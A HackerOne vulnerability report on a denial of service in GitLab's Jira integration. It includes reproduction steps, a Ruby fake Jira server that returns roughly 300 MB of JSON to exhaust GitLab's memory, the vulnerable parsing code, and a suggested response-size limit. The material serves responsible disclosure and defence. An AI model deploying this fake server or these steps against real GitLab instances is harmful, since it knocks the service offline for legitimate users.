GitLab DoS via integrating a malicious Jira issue tracker into a project
HackerOne report #2637997 by a92847865 on 2024-08-04, assigned to @greg:
Report
Summary
You can integrate Jira as your project's external issue tracker in GitLab. When testing the integration, the GitLab server connects to the Jira server to fetch server information. Because the `Gitlab::Jira::HttpClient.make_request` method does not check the response body size, an attacker-controlled Jira issue tracker server can send responses with very large bodies (e.g. a 300 MB JSON file) to the GitLab application. Those responses are then parsed by `JIRA::Resource::ServerInfo.all`, consuming GiBs of RAM. Triggering two such requests (from GitLab to the malicious server) is enough to consume all available memory of a 1k-user self-managed GitLab EE instance and make it unreachable for legitimate users.
Steps to reproduce
- Register two VMs: a `1k-user self-managed Gitlab EE instance` VM (8 vCPU, 16 GB RAM) and a smaller `fake_server` VM.
- Install the latest GitLab EE on the `1k-user self-managed Gitlab EE instance` VM.
- Create a new project.
- SSH into the `fake_server` VM and upload these files ( and ) to it.
- Start `fake_server` on port 80: `sudo nodejs fake_server.js` (a minimal equivalent is sketched after this list).
- Open 2 tabs with the same URL below. You can also capture the equivalent curl command with Chrome's Developer Tools and send the 2 requests via curl; that is how the attack could be automated against larger instances.
  `http://[your_GL's_host_name]/[optional_group_name]/[project_name]/-/settings/integrations/jira/edit`
- In each tab, fill in the necessary fields:
  - Web URL: `http://[fake_server_IP]`
  - Email or username, API token or password, Jira issue prefix: random strings
- Click the "Test settings" button.
- SSH into the `1k-user self-managed Gitlab EE instance` VM and run `htop`. You should see that GitLab consumes all available memory and the instance becomes unavailable.
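The two files uploaded to the `fake_server` VM are attached to the report and not shown inline. For illustration only, a minimal Ruby equivalent of such a server could look like the sketch below; the filename, port handling, and JSON structure are assumptions (the original `fake_server.js` is a Node.js script started with `sudo nodejs fake_server.js`).

```ruby
# fake_jira_server.rb -- illustrative Ruby equivalent (assumption) of the
# Node.js fake_server.js attached to the report; not the original script.
# It answers every HTTP request with one very large, syntactically valid JSON
# body so that the GitLab side allocates gigabytes while parsing it.
require 'socket'

PORT = 80 # port 80 requires root; any port works if it is added to the Web URL

# Roughly 300 MB of JSON (the size quoted in the summary), built cheaply as a
# flat array of millions of short strings. The exact structure is an
# assumption; any huge JSON document has the same effect.
huge_json = "[#{('"aaaa",' * 40_000_000).chomp(',')}]"

server = TCPServer.new('0.0.0.0', PORT)
loop do
  conn = server.accept
  Thread.new(conn) do |sock|
    begin
      sock.readpartial(4096) # consume the request; the path is irrelevant here
      sock.write([
        'HTTP/1.1 200 OK',
        'Content-Type: application/json',
        "Content-Length: #{huge_json.bytesize}",
        'Connection: close',
        '', ''
      ].join("\r\n"))
      sock.write(huge_json)
    rescue IOError, Errno::EPIPE
      # client disconnected early; ignore
    ensure
      sock.close
    end
  end
end
```

Run it as root (analogous to the `sudo nodejs fake_server.js` step) and point the integration's Web URL at the VM's IP.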
Impact
DoS: complete service outage for other users.
Examples
What is the current bug behavior?
- The `Gitlab::Jira::HttpClient.make_request` method doesn't check the response's body size: https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/jira/http_client.rb#L31-62
- The response parsing is then triggered by:

```ruby
def server_info
  client_url.present? ? jira_request(API_ENDPOINTS[:server_info]) { client.ServerInfo.all.attrs } : nil
end
```

- Here is the definition of the `client.ServerInfo.all` method from https://github.com/sumoheavy/jira-ruby/blob/master/lib/jira/resource/serverinfo.rb:

```ruby
def self.all(client, options = {})
  response = client.get(collection_path(client))
  json = parse_json(response.body) # *parsing response*
  new(client, { attrs: json }.merge(options))
end
```
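To see why a ~300 MB body translates into GiBs of resident memory: `parse_json` materialises the entire body as a Ruby object graph while the raw body string is still referenced, and for JSON made of many small values the parsed graph is several times larger than the raw text; each concurrent "Test settings" request then holds its own copies. The snippet below is an illustration under these assumptions, not code from GitLab, jira-ruby, or the report.

```ruby
# Illustration only (assumption, not GitLab or jira-ruby code): parsing a large
# JSON body keeps the raw string alive and additionally builds a Ruby object
# graph whose per-object overhead multiplies the footprint. Scaled to ~28 MB
# here so it runs quickly; the attack body is roughly 10x larger.
require 'json'

raw    = "[#{('"aaaa",' * 4_000_000).chomp(',')}]" # ~28 MB of raw JSON text
parsed = JSON.parse(raw)                           # ~4 million Ruby string objects

# Both `raw` and `parsed` stay referenced while ServerInfo.all builds its attrs,
# and each concurrent "Test settings" request repeats this in its own thread.
puts "elements: #{parsed.length}, raw bytes: #{raw.bytesize}"
```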
What is the expected correct behavior?
The `Gitlab::Jira::HttpClient.make_request` method should enforce a limit on the response's body size.
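This is not GitLab's actual fix; as one possible sketch (the limit value, the method name `fetch_with_limit`, and the error handling are assumptions), the client could reject oversized responses both from the declared `Content-Length` and while streaming the body:

```ruby
# Sketch only (assumption, not GitLab's implementation): cap the Jira response
# body both via the declared Content-Length and while streaming, since the
# header can be missing or wrong (e.g. chunked transfer encoding).
require 'net/http'

MAX_RESPONSE_BODY_SIZE = 10 * 1024 * 1024 # 10 MB -- an arbitrary illustrative cap

def fetch_with_limit(uri)
  Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') do |http|
    http.request(Net::HTTP::Get.new(uri)) do |response|
      # Reject early when the server declares an oversized body.
      declared = response['Content-Length']&.to_i
      raise 'Jira response too large' if declared && declared > MAX_RESPONSE_BODY_SIZE

      # Also enforce the cap while streaming the body.
      body = +''
      response.read_body do |chunk|
        body << chunk
        raise 'Jira response too large' if body.bytesize > MAX_RESPONSE_BODY_SIZE
      end
      return body
    end
  end
end

# Example: fetch_with_limit(URI('http://jira.example.com/rest/api/2/serverInfo'))
```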
Relevant logs and/or screenshots
Output of checks
Results of GitLab environment info
System information
System: Ubuntu 20.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.1.5p253
Gem Version: 3.5.11
Bundler Version: 2.5.11
Rake Version: 13.0.6
Redis Version: 7.0.15
Sidekiq Version: 7.1.6
Go Version: unknown
GitLab information
Version: 17.2.1-ee
Revision: 88793996279
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 14.11
URL: http://34.16.168.95
HTTP Clone URL: http://34.16.168.95/some-group/some-project.git
SSH Clone URL: git@34.16.168.95:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.37.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Gitaly
- default Address: unix:/var/opt/gitlab/gitaly/gitaly.socket
- default Version: 17.2.1
- default Git Version: 2.45.2
Impact
An attacker can take down a 1k-user self-managed GitLab EE instance by testing a malicious Jira server (external issue tracker) in a project's settings, making the GitLab EE instance unavailable to other users.